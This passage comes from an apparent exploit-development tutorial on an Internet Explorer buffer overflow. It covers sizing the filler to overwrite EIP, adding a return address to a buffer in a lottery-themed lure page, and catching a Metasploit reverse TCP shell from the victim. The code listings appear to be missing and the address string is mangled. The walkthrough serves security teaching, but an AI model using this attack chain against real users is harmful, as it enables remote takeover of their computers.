If you punched in the code from our setup, then you put in too many zs and calling exploit() crashes IE. We need to know how many z's to write. I'll leave it to you to find the sweet number of fluff so that we're left with the perfect four bytes of space needed to overwrite EIP. Here's a hint to get you started: 390 bytes is just shy of the sweet spot, but go beyond 395 bytes and you'll overshoot the landing.

Let's tear down our page so we can modify lottery.html. I'm changing the buffer declaration to concatenate our target address with var buffer = "zzzz... [snip] ...zzzz" + "xffxffxecx11" (don't forget the endianness):

Save the file and fire up the SimpleHTTPServer again. The trap is set, but we have just one last step: we need a handler.

Like msfvenom, I expect this process to be second-nature to you by now: fire up msfconsole and configure your reverse TCP handler. Make sure you configure LPORT with the same number encoded in your shellcode:

You can see here that we received a session from the victim PC when our unfortunate user tried to claim the lottery winnings. Note the privileges: yes, we're stuck with the privileges under which Internet Explorer was executed. Try experimenting with running IE with different user accounts and see if it makes a difference for the attacker.